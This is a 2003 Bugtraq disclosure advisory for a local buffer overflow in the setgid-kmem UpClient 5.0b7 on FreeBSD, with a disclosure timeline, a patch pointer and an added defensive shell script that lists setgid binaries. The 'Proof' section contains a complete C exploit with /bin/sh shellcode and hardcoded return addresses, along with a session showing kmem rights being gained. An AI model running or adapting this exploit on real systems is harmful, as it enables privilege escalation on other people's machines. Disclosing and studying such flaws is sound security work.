Message-ID: <45432789478.20030527102348@nux-acid.org>
Date: Tue, 27 May 2003 10:23:48 +0200
From: Gino Thomas <g.thomas@...-acid.org>
To: bugtraq@...urityfocus.com
Subject: NuxAcid#002 - Buffer Overflow in UpClient


+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=
NUX-ACID ADVISORY #002

Advisory name           : Local Buffer Overflow in upclient 
Risk                    : Medium (exploit grants kmem rights)
Date                    : 27.05.2003
Application             : upclient
Versions Vulnerable     : UpClient 5.0b7, possible others
Vendor                  : Carsten Klapp <carstenklapp@...rs.sf.net> \
                          Ryan Grove ryan@...ko.com

Timeline:
23.05.03 - found vulnerability
23.05.03 - written proof of concept code
23.05.03 - informed the author(s)
25.05.03 - informed the freebsd security officers
26.05.03 - solution found
27.05.03 - public release


by Gino Thomas (alias 'dairaen'), http://www.nux-acid.org
This information is provided freely to all interested parties
and may be redistributed provided that it is not altered in any way

This advisory was provided under the policy 
documented at http://www.wiretrip.net/rfp/policy.html
+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=


=+[Overview]+=

Uptime Client is a little program that keeps track of your uptime and
sends it to a server where you can compare it to many other hosts and
browse through various statistical information. 

WWW: http://uptimes.wonko.com/


=+[Description]+=

While pentesting the FreeBSD ports tree I found /usr/ports/misc/upclient
vulnerable to a common buffer overflow.

On FreeBSD at least, upclient is installed setgid kmem by default:
-r-xr-sr-x  1 root  kmem  28312 Mar 23 19:58 /usr/local/sbin/upclient

This means an attacker could gain egid=2(kmem) groups=2(kmem) rights,
which provide at least read access to the following files:

develop# find / -group kmem
/dev/kmem
/dev/mem
/dev/perfmon
/usr/bin/fstat
/usr/bin/ipcs
/usr/bin/netstat
/usr/bin/systat
/usr/bin/top
/usr/bin/vmstat
/usr/sbin/iostat
/usr/sbin/pstat
/usr/sbin/swapinfo
/usr/sbin/trpt
/sbin/ccdconfig

Having egid=2(kmem) groups=2(kmem) makes it easier
to get root privileges.

From 'man kmem':

"The special file /dev/mem is an interface to the physical memory of the
computer.  Byte offsets in this file are interpreted as physical memory
addresses.  Reading and writing this file is equivalent to reading and
writing memory itself.  Only offsets within the bounds of /dev/mem are
allowed.

Kernel virtual memory is accessed through the interface /dev/kmem in the
same manner as /dev/mem.  Only kernel virtual addresses that are currently
mapped to memory are allowed."
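
The find above lists what group kmem can read; the exposure comes from
programs that run with that group. The following is an added example, not
part of the advisory: it lists setgid executables for a group and tags those
under usr/local, where FreeBSD ports install. The function names are
hypothetical, and the usr/local convention is an assumption on other systems.

```shell
#!/bin/sh
# Added example (not from the advisory). ROOT and GROUP are caller-supplied.
# Treating ROOT/usr/local as the third-party prefix follows the FreeBSD ports
# convention and is an assumption elsewhere.

# list_setgid ROOT GROUP
# Print regular files under ROOT that carry the setgid bit (02000) and are
# owned by GROUP, i.e. programs that run with GROUP as their effective gid.
# Device nodes such as /dev/kmem are excluded by -type f.
list_setgid() {
    find "$1" -type f -perm -2000 -group "$2" 2>/dev/null | sort
}

# audit_setgid ROOT GROUP
# Tag each hit "third-party" when it lives under ROOT/usr/local, otherwise
# "base". Prints one "<tag> <path>" line per file.
audit_setgid() {
    root=${1%/}
    list_setgid "$1" "$2" | while IFS= read -r path; do
        case "$path" in
            "$root"/usr/local/*) printf 'third-party %s\n' "$path" ;;
            *)                   printf 'base %s\n' "$path" ;;
        esac
    done
}

# count_third_party ROOT GROUP
# Number of third-party setgid programs for GROUP; each one is code outside
# the base system that runs with the group's rights and deserves review.
count_third_party() {
    audit_setgid "$1" "$2" | grep -c '^third-party ' || true
}

# Run as a script: ./audit_setgid.sh / kmem
if [ "$#" -eq 2 ]; then
    audit_setgid "$1" "$2"
fi
```

On a host like the one in this advisory, /usr/local/sbin/upclient would be
reported as third-party and the base tools such as /usr/bin/netstat as base.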


=+[Proof]+=

See the exploit in action:

> id
uid=1001(admin) gid=1001(admin) groups=1001(admin), 0(wheel)
>./upclient_exploit
$ id
uid=1001(admin) gid=1001(admin) egid=2(kmem) groups=2(kmem), 
1001(admin),0(wheel)
$

-------------------------------upclient_exploit.c-------------------------------
/*
*       
* NuxAcid - UPCLIENT Local Buffer Overflow Exploit
* written on/for FreeBSD
* tested against UpClient 5.0b7 on FreeBSD 4.8
* for FreeBSD 5.x the code has to be tweaked
* other versions may be vulnerable too
*
* 2003 by Gino Thomas, http://www.nux-acid.org
*/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>   /* execl */

#define BUFFERSIZE 1022


unsigned long get_sp(void) {
 __asm__("movl %esp, %eax");
}

int main(int argc, char **argv)
{
  char buffer[BUFFERSIZE] = "";

//FreeBSD exec/setuid Shellcode
static char shellcode[] =
"\xeb\x23\x5e\x8d\x1e\x89\x5e\x0b\x31\xd2\x89\x56\x07\x89\x56\x0f"
"\x89\x56\x14\x88\x56\x19\x31\xc0\xb0\x3b\x8d\x4e\x0b\x89\xca\x52"
"\x51\x53\x50\xeb\x18\xe8\xd8\xff\xff\xff/bin/sh\x01\x01\x01\x01"
"\x02\x02\x02\x02\x03\x03\x03\x03\x9a\x04\x04\x04\x04\x07\x04";

memset(buffer, 0x90 ,sizeof(buffer));
*(long *)&buffer[BUFFERSIZE - 4] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 8] = 0xbfbffb21;
*(long *)&buffer[BUFFERSIZE - 16] = 0xbfbffb21;
memcpy(buffer + BUFFERSIZE - 16 - strlen(shellcode), shellcode, strlen(shellcode));

execl("/usr/local/sbin/upclient","upclient", "-p", buffer, NULL);
return 0;
}
-------------------------------upclient_exploit.c-------------------------------



=+[Solution]+=

The author was informed on 23.05.03. He immediately
started to develop a patch and has taken security
very seriously, always informing me about his steps
and willing to improve the overall security of 
upclient.


Patches:

upgrade to UpClient 5.0b8 at https://sourceforge.net/projects/upclient/



=+[Personal Marketing]+=

I am seeking a JOB in Munich (Germany).
If you have security related jobs to offer
please feel free to contact me at g.thomas@...-acid.org

You can get a short overview of me and my skills
by reading the personal section of my website 
http://www.nux-acid.org

EOF


